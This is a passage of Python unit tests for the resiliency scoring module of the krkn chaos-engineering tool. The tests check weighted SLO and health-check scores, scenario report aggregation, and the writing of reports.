res = Resiliency(alerts_yaml_path=temp)
# "high" passes (10 pts), "low" fails (loses 0.5 pts)
res._results = {"high": True, "low": False}
score = res.calculate_score()
# Total: 10.5, Lost: 0.5 -> 95%
self.assertEqual(score, 95)
self.assertEqual(res._breakdown["total_points"], 10.5)
self.assertEqual(res._breakdown["points_lost"], 0.5)
finally:
os.unlink(temp)
def test_calculate_score_stores_breakdown(self):
"""Test that calculate_score stores the breakdown dict."""
self.res._results = {"slo1": True, "slo2": False}
self.res.calculate_score()
self.assertIsNotNone(self.res._breakdown)
self.assertIn("passed", self.res._breakdown)
self.assertIn("failed", self.res._breakdown)
self.assertIn("total_points", self.res._breakdown)
self.assertIn("points_lost", self.res._breakdown)
class TestResiliencyToDict(unittest.TestCase):
"""Test cases for to_dict method."""
def setUp(self):
"""Set up test fixtures."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([{"expr": "test", "severity": "critical"}], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
def test_to_dict_before_calculate_raises_error(self):
"""Test that to_dict raises error if calculate_score not called."""
with self.assertRaises(RuntimeError):
self.res.to_dict()
def test_to_dict_returns_complete_data(self):
"""Test that to_dict returns all expected fields."""
self.res._results = {"slo_0": True}
health_checks = {"health1": True}
self.res.calculate_score(health_check_results=health_checks)
result = self.res.to_dict()
self.assertIn("score", result)
self.assertIn("breakdown", result)
self.assertIn("slo_results", result)
self.assertIn("health_check_results", result)
self.assertEqual(result["slo_results"], {"slo_0": True})
self.assertEqual(result["health_check_results"], health_checks)
class TestResiliencyScenarioReports(unittest.TestCase):
"""Test cases for scenario-based resiliency evaluation."""
def setUp(self):
"""Set up test fixtures."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([
{"expr": "up == 0", "severity": "critical", "description": "slo1"}
], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
self.mock_prom = Mock()
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_report(self, mock_calc_score, mock_eval_slos):
"""Test adding a scenario report."""
mock_eval_slos.return_value = {"slo1": True}
mock_calc_score.return_value = (100, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
score = self.res.add_scenario_report(
scenario_name="test_scenario",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
weight=1.5,
)
self.assertEqual(score, 100)
self.assertEqual(len(self.res.scenario_reports), 1)
self.assertEqual(self.res.scenario_reports[0]["name"], "test_scenario")
self.assertEqual(self.res.scenario_reports[0]["weight"], 1.5)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_report_calculates_weighted_average(self, mock_eval_slos):
"""Test that finalize_report calculates weighted average correctly."""
mock_eval_slos.return_value = {"slo1": True}
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 2, 0, 0)
# Add two scenarios with different scores and weights
with patch('krkn.resiliency.resiliency.calculate_resiliency_score') as mock_calc:
mock_calc.return_value = (80, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
self.res.add_scenario_report(
scenario_name="scenario1",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
weight=2,
)
mock_calc.return_value = (60, {"passed": 0, "failed": 1, "total_points": 3, "points_lost": 3})
self.res.add_scenario_report(
scenario_name="scenario2",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
weight=1,
)
with patch('krkn.resiliency.resiliency.calculate_resiliency_score') as mock_calc:
mock_calc.return_value = (100, {"passed": 1, "failed": 0})
self.res.finalize_report(
prom_cli=self.mock_prom,
total_start_time=start,
total_end_time=end,
)
# Weighted average: (80*2 + 60*1) / (2+1) = 220/3 = 73.33... = 73
self.assertEqual(self.res.summary["resiliency_score"], 73)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_report_populates_summary_and_detailed(self, mock_eval_slos):
"""Test that finalize_report sets summary and detailed_report."""
mock_eval_slos.return_value = {"slo1": True}
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
with patch('krkn.resiliency.resiliency.calculate_resiliency_score') as mock_calc:
mock_calc.return_value = (95, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
self.res.add_scenario_report(
scenario_name="s1",
prom_cli=self.mock_prom,
start_time=start,
end_time=end,
)
self.res.finalize_report(
prom_cli=self.mock_prom,
total_start_time=start,
total_end_time=end,
)
self.assertIsNotNone(self.res.summary)
self.assertIn("resiliency_score", self.res.summary)
self.assertIn("scenarios", self.res.summary)
self.assertIsNotNone(self.res.detailed_report)
self.assertIn("scenarios", self.res.detailed_report)
def test_finalize_report_without_scenarios_raises_error(self):
"""Test that finalize_report raises error if no scenarios added."""
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
with self.assertRaises(RuntimeError):
self.res.finalize_report(
prom_cli=self.mock_prom,
total_start_time=start,
total_end_time=end,
)
def test_get_summary_before_finalize_raises_error(self):
"""Test that get_summary raises RuntimeError before finalize_report is called."""
with self.assertRaises(RuntimeError):
self.res.get_summary()
def test_get_detailed_report_before_finalize_raises_error(self):
"""Test that get_detailed_report raises RuntimeError before finalize_report is called."""
with self.assertRaises(RuntimeError):
self.res.get_detailed_report()
class TestResiliencyCompactBreakdown(unittest.TestCase):
"""Test cases for compact_breakdown static method."""
def test_compact_breakdown_with_valid_report(self):
"""Test compact_breakdown with valid report structure."""
report = {
"score": 85,
"breakdown": {
"passed": 8,
"failed": 2,
}
}
result = Resiliency.compact_breakdown(report)
self.assertEqual(result["resiliency_score"], 85)
self.assertEqual(result["passed_slos"], 8)
self.assertEqual(result["total_slos"], 10)
def test_compact_breakdown_with_missing_fields_uses_defaults(self):
"""Test compact_breakdown handles missing fields gracefully."""
report = {}
result = Resiliency.compact_breakdown(report)
self.assertEqual(result["resiliency_score"], 0)
self.assertEqual(result["passed_slos"], 0)
self.assertEqual(result["total_slos"], 0)
class TestResiliencyAddScenarioReports(unittest.TestCase):
"""Test cases for the add_scenario_reports method."""
def setUp(self):
"""Set up test fixtures."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([
{"expr": "up == 0", "severity": "critical", "description": "slo1"}
], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
self.mock_prom = Mock()
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_reports_enriches_dict_telemetry(self, mock_calc_score, mock_eval_slos):
"""Test that dict telemetry items are enriched with a resiliency_report."""
mock_eval_slos.return_value = {"slo1": True}
mock_calc_score.return_value = (85, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
telemetries = [
{
"scenario": "pod_scenario",
"start_timestamp": 1609459200,
"end_timestamp": 1609462800,
}
]
start = datetime.datetime(2025, 1, 1, 0, 0, 0)
end = datetime.datetime(2025, 1, 1, 1, 0, 0)
self.res.add_scenario_reports(
scenario_telemetries=telemetries,
prom_cli=self.mock_prom,
scenario_type="default_type",
batch_start_dt=start,
batch_end_dt=end,
weight=1.5,
)
self.assertEqual(len(self.res.scenario_reports), 1)
self.assertIn("resiliency_report", telemetries[0])
self.assertIn("resiliency_score", telemetries[0]["resiliency_report"])
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_reports_uses_batch_times_when_timestamps_missing(self, mock_calc_score, mock_eval_slos):
"""Test that batch times are used when telemetry has no timestamps."""
mock_eval_slos.return_value = {}
mock_calc_score.return_value = (0, {"passed": 0, "failed": 0, "total_points": 0, "points_lost": 0})
telemetries = [{"scenario": "my_scenario"}]
start = datetime.datetime(2025, 6, 1, 0, 0, 0)
end = datetime.datetime(2025, 6, 1, 1, 0, 0)
self.res.add_scenario_reports(
scenario_telemetries=telemetries,
prom_cli=self.mock_prom,
scenario_type="fallback_type",
batch_start_dt=start,
batch_end_dt=end,
)
# evaluate_slos should have been called with the batch times
call_kwargs = mock_eval_slos.call_args[1]
self.assertEqual(call_kwargs["start_time"], start)
self.assertEqual(call_kwargs["end_time"], end)
@patch('krkn.resiliency.resiliency.evaluate_slos')
@patch('krkn.resiliency.resiliency.calculate_resiliency_score')
def test_add_scenario_reports_uses_scenario_name_from_telemetry(self, mock_calc_score, mock_eval_slos):
"""Test that scenario name is taken from telemetry, not the fallback type."""
mock_eval_slos.return_value = {"slo1": True}
mock_calc_score.return_value = (100, {"passed": 1, "failed": 0, "total_points": 3, "points_lost": 0})
telemetries = [{"scenario": "real_scenario_name"}]
self.res.add_scenario_reports(
scenario_telemetries=telemetries,
prom_cli=self.mock_prom,
scenario_type="fallback_type",
batch_start_dt=datetime.datetime(2025, 1, 1),
batch_end_dt=datetime.datetime(2025, 1, 2),
)
self.assertEqual(self.res.scenario_reports[0]["name"], "real_scenario_name")
class TestFinalizeAndSave(unittest.TestCase):
"""Test cases for finalize_and_save method."""
def setUp(self):
"""Set up test fixtures with a pre-populated scenario report."""
with tempfile.NamedTemporaryFile(mode='w', suffix='.yaml', delete=False) as f:
import yaml
yaml.dump([
{"expr": "up == 0", "severity": "critical", "description": "slo1"}
], f)
self.temp_file = f.name
self.res = Resiliency(alerts_yaml_path=self.temp_file)
self.mock_prom = Mock()
self.start = datetime.datetime(2025, 1, 1, 0, 0, 0)
self.end = datetime.datetime(2025, 1, 1, 2, 0, 0)
# Pre-populate a scenario report so finalize_report doesn't raise
self.res.scenario_reports = [
{
"name": "test_scenario",
"window": {"start": self.start.isoformat(), "end": self.end.isoformat()},
"score": 90,
"weight": 1,
"breakdown": {"total_points": 3, "points_lost": 0, "passed": 1, "failed": 0},
"slo_results": {"slo1": True},
"health_check_results": {},
}
]
def tearDown(self):
"""Clean up temp files."""
if os.path.exists(self.temp_file):
os.unlink(self.temp_file)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_and_save_standalone_writes_detailed_file(self, mock_eval_slos):
"""Test that standalone mode writes a detailed JSON report to the given path."""
mock_eval_slos.return_value = {"slo1": True}
with tempfile.TemporaryDirectory() as tmpdir:
detailed_path = os.path.join(tmpdir, "resiliency-report.json")
self.res.finalize_and_save(
prom_cli=self.mock_prom,
total_start_time=self.start,
total_end_time=self.end,
run_mode="standalone",
detailed_path=detailed_path,
)
self.assertTrue(os.path.exists(detailed_path))
with open(detailed_path) as fp:
report = json.load(fp)
self.assertIn("scenarios", report)
@patch('builtins.print')
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_and_save_controller_mode_prints_to_stdout(self, mock_eval_slos, mock_print):
"""Test that controller mode prints the detailed report to stdout with the expected prefix."""
mock_eval_slos.return_value = {"slo1": True}
self.res.finalize_and_save(
prom_cli=self.mock_prom,
total_start_time=self.start,
total_end_time=self.end,
run_mode="detailed",
)
mock_print.assert_called()
call_args = str(mock_print.call_args)
self.assertIn("KRKN_RESILIENCY_REPORT_JSON", call_args)
@patch('krkn.resiliency.resiliency.evaluate_slos')
def test_finalize_and_save_populates_summary_after_call(self, mock_eval_slos):
"""Test that finalize_and_save populates summary so get_summary works afterward."""
mock_eval_slos.return_value = {"slo1": True}
self.res.finalize_and_save(
prom_cli=self.mock_prom,
total_start_time=self.start,
total_end_time=self.end,
)
summary = self.res.get_summary()
self.assertIsNotNone(summary)
self.assertIn("resiliency_score", summary)
if __name__ == '__main__':
unittest.main()

View File

@@ -0,0 +1,409 @@
"""
Tests for krkn.resiliency.score module.
How to run these tests:
# Run all tests in this file
python -m unittest tests.test_resiliency_score
# Run all tests with verbose output
python -m unittest tests.test_resiliency_score -v
# Run a specific test class
python -m unittest tests.test_resiliency_score.TestSLOResult
python -m unittest tests.test_resiliency_score.TestCalculateResiliencyScore
# Run a specific test method
python -m unittest tests.test_resiliency_score.TestSLOResult.test_slo_result_initialization
python -m unittest tests.test_resiliency_score.TestCalculateResiliencyScore.test_all_slos_passing_returns_100
# Run with coverage
python -m coverage run -m unittest tests.test_resiliency_score
python -m coverage report -m
"""
import unittest
from krkn.resiliency.score import (
SLOResult,
calculate_resiliency_score,
DEFAULT_WEIGHTS,
)
class TestSLOResult(unittest.TestCase):
"""Test cases for the SLOResult class."""
def test_slo_result_initialization(self):
"""Test SLOResult object initialization."""
slo = SLOResult(name="test_slo", severity="critical", passed=True)
self.assertEqual(slo.name, "test_slo")
self.assertEqual(slo.severity, "critical")
self.assertTrue(slo.passed)
def test_slo_result_weight_critical_default(self):
"""Test weight calculation for critical SLO with default weights."""
slo = SLOResult(name="test_slo", severity="critical", passed=True)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["critical"])
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 3)
def test_slo_result_weight_warning_default(self):
"""Test weight calculation for warning SLO with default weights."""
slo = SLOResult(name="test_slo", severity="warning", passed=True)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["warning"])
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 1)
def test_slo_result_weight_custom_severity_weights(self):
"""Test weight calculation with custom severity-level weights."""
custom_weights = {"critical": 5, "warning": 2}
slo_critical = SLOResult(name="test1", severity="critical", passed=True)
slo_warning = SLOResult(name="test2", severity="warning", passed=True)
self.assertEqual(slo_critical.weight(custom_weights), 5)
self.assertEqual(slo_warning.weight(custom_weights), 2)
def test_slo_result_weight_unknown_severity_falls_back_to_warning(self):
"""Test that unknown severity falls back to warning weight."""
slo = SLOResult(name="test_slo", severity="unknown", passed=True)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["warning"])
def test_slo_result_custom_weight_overrides_severity(self):
"""Test that a per-SLO custom weight overrides the severity-based weight."""
slo = SLOResult(name="test_slo", severity="critical", passed=True, weight=10)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 10)
def test_slo_result_custom_weight_zero_is_valid(self):
"""Test that a per-SLO weight of 0 is respected."""
slo = SLOResult(name="test_slo", severity="critical", passed=False, weight=0)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 0)
def test_slo_result_explicit_none_weight_falls_back_to_severity(self):
"""Test that weight=None explicitly falls back to severity-based weight, not 0."""
slo = SLOResult(name="test_slo", severity="critical", passed=True, weight=None)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), DEFAULT_WEIGHTS["critical"])
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 3)
def test_slo_result_float_custom_weight(self):
"""Test that a fractional custom weight (e.g. 0.5 as documented) is returned as-is."""
slo = SLOResult(name="test_slo", severity="warning", passed=True, weight=0.5)
self.assertEqual(slo.weight(DEFAULT_WEIGHTS), 0.5)
class TestCalculateResiliencyScore(unittest.TestCase):
"""Test cases for the calculate_resiliency_score function."""
def test_all_slos_passing_returns_100(self):
"""Test that all passing SLOs returns score of 100."""
slo_definitions = {
"slo1": "critical",
"slo2": "warning",
}
prometheus_results = {
"slo1": True,
"slo2": True,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(score, 100)
self.assertEqual(breakdown["passed"], 2)
self.assertEqual(breakdown["failed"], 0)
self.assertEqual(breakdown["points_lost"], 0)
def test_all_slos_failing_returns_0(self):
"""Test that all failing SLOs returns score of 0."""
slo_definitions = {
"slo1": "critical",
"slo2": "warning",
}
prometheus_results = {
"slo1": False,
"slo2": False,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(score, 0)
self.assertEqual(breakdown["passed"], 0)
self.assertEqual(breakdown["failed"], 2)
def test_mixed_results_calculates_correct_score(self):
"""Test score calculation with mixed pass/fail results."""
slo_definitions = {
"slo_critical": "critical", # weight=3
"slo_warning": "warning", # weight=1
}
prometheus_results = {
"slo_critical": True, # 3 points
"slo_warning": False, # 0 points (lost 1)
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 4 points, Lost: 1 point
# Score: (4-1)/4 * 100 = 75%
self.assertEqual(score, 75)
self.assertEqual(breakdown["total_points"], 4)
self.assertEqual(breakdown["points_lost"], 1)
self.assertEqual(breakdown["passed"], 1)
self.assertEqual(breakdown["failed"], 1)
def test_slo_not_in_prometheus_results_is_excluded(self):
"""Test that SLOs not in prometheus_results are excluded from calculation."""
slo_definitions = {
"slo1": "critical",
"slo2": "warning",
"slo3": "critical", # Not in prometheus_results
}
prometheus_results = {
"slo1": True,
"slo2": True,
# slo3 is missing (no data)
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Only slo1 and slo2 should be counted
self.assertEqual(score, 100)
self.assertEqual(breakdown["passed"], 2)
self.assertEqual(breakdown["failed"], 0)
def test_health_checks_are_treated_as_critical(self):
"""Test that health checks are always weighted as critical."""
slo_definitions = {}
prometheus_results = {}
health_check_results = {
"http://service1": True,
"http://service2": False,
}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# 2 health checks, each critical (weight=3)
# Total: 6 points, Lost: 3 points (one failed)
# Score: (6-3)/6 * 100 = 50%
self.assertEqual(score, 50)
self.assertEqual(breakdown["total_points"], 6)
self.assertEqual(breakdown["points_lost"], 3)
def test_combined_slos_and_health_checks(self):
"""Test calculation with both SLOs and health checks."""
slo_definitions = {
"slo1": "warning", # weight=1
}
prometheus_results = {
"slo1": True,
}
health_check_results = {
"health1": True, # weight=3 (critical)
"health2": False, # weight=3 (critical)
}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 1 + 3 + 3 = 7 points
# Lost: 3 points (health2 failed)
# Score: (7-3)/7 * 100 = 57.14... = 57%
self.assertEqual(score, 57)
self.assertEqual(breakdown["total_points"], 7)
self.assertEqual(breakdown["points_lost"], 3)
self.assertEqual(breakdown["passed"], 2)
self.assertEqual(breakdown["failed"], 1)
def test_per_slo_custom_weight_overrides_severity(self):
"""Test that per-SLO custom weight in extended format overrides default severity weight."""
slo_definitions = {
"slo1": {"severity": "critical", "weight": 10},
}
prometheus_results = {
"slo1": False,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(breakdown["total_points"], 10)
self.assertEqual(breakdown["points_lost"], 10)
self.assertEqual(score, 0)
def test_extended_format_mixed_with_legacy_format(self):
"""Test that extended dict format and legacy string format can be mixed."""
slo_definitions = {
"slo_custom": {"severity": "warning", "weight": 5}, # custom weight
"slo_legacy": "critical", # legacy, weight=3
}
prometheus_results = {
"slo_custom": False, # loses 5 pts
"slo_legacy": True, # keeps 3 pts
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 5 + 3 = 8, Lost: 5
# Score: (8-5)/8 * 100 = 37.5 -> 37
self.assertEqual(breakdown["total_points"], 8)
self.assertEqual(breakdown["points_lost"], 5)
self.assertEqual(score, 37)
def test_extended_format_weight_none_falls_back_to_severity(self):
"""Test that weight=None in extended dict format falls back to severity-based weight."""
slo_definitions = {
"slo1": {"severity": "critical", "weight": None}, # should use default critical weight=3
}
prometheus_results = {"slo1": False}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# weight falls back to critical=3
self.assertEqual(breakdown["total_points"], 3)
self.assertEqual(breakdown["points_lost"], 3)
self.assertEqual(score, 0)
def test_float_custom_weight_scoring(self):
"""Test scoring with fractional weights as documented (e.g. weight: 0.5)."""
slo_definitions = {
"slo_high": {"severity": "critical", "weight": 10},
"slo_low": {"severity": "warning", "weight": 0.5},
}
prometheus_results = {
"slo_high": True, # keeps 10 pts
"slo_low": False, # loses 0.5 pts
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 10.5, Lost: 0.5 -> (10/10.5)*100 = 95.23... -> 95
self.assertEqual(breakdown["total_points"], 10.5)
self.assertEqual(breakdown["points_lost"], 0.5)
self.assertEqual(score, 95)
def test_failed_slo_with_zero_weight_does_not_affect_score(self):
"""Test that a failing SLO with weight=0 contributes nothing to points_lost."""
slo_definitions = {
"slo_zero": {"severity": "critical", "weight": 0},
"slo_normal": "warning", # weight=1
}
prometheus_results = {
"slo_zero": False, # fails but contributes 0 pts
"slo_normal": True,
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(breakdown["total_points"], 1)
self.assertEqual(breakdown["points_lost"], 0)
self.assertEqual(score, 100)
def test_all_custom_weight_slos_passing_returns_100(self):
"""Test that all custom-weight SLOs passing returns 100 regardless of weight values."""
slo_definitions = {
"slo1": {"severity": "critical", "weight": 20},
"slo2": {"severity": "warning", "weight": 5},
"slo3": {"severity": "critical", "weight": 0.5},
}
prometheus_results = {"slo1": True, "slo2": True, "slo3": True}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
self.assertEqual(score, 100)
self.assertEqual(breakdown["points_lost"], 0)
self.assertEqual(breakdown["passed"], 3)
self.assertEqual(breakdown["failed"], 0)
def test_empty_slo_definitions_returns_zero_score(self):
"""Test that empty SLO definitions returns score of 0."""
score, breakdown = calculate_resiliency_score(
slo_definitions={},
prometheus_results={},
health_check_results={}
)
self.assertEqual(score, 0)
self.assertEqual(breakdown["total_points"], 0)
self.assertEqual(breakdown["points_lost"], 0)
self.assertEqual(breakdown["passed"], 0)
self.assertEqual(breakdown["failed"], 0)
def test_prometheus_results_coerced_to_bool(self):
"""Test that prometheus results are properly coerced to boolean."""
slo_definitions = {
"slo1": "warning",
"slo2": "warning",
"slo3": "warning",
}
prometheus_results = {
"slo1": 1, # Truthy
"slo2": 0, # Falsy
"slo3": None, # Falsy
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# slo1 passes (1 point), slo2 and slo3 fail (0 points each)
# Total: 3 points, Lost: 2 points
# Score: (3-2)/3 * 100 = 33.33... = 33%
self.assertEqual(score, 33)
self.assertEqual(breakdown["passed"], 1)
self.assertEqual(breakdown["failed"], 2)
def test_score_calculation_rounds_down(self):
"""Test that score calculation rounds down to integer."""
slo_definitions = {
"slo1": "critical", # 3 points
"slo2": "critical", # 3 points
"slo3": "critical", # 3 points
}
prometheus_results = {
"slo1": True, # 3 points
"slo2": True, # 3 points
"slo3": False, # 0 points (lost 3)
}
health_check_results = {}
score, breakdown = calculate_resiliency_score(
slo_definitions, prometheus_results, health_check_results
)
# Total: 9 points, Lost: 3 points
# Score: (9-3)/9 * 100 = 66.666... -> 66
self.assertEqual(score, 66)
if __name__ == '__main__':
unittest.main()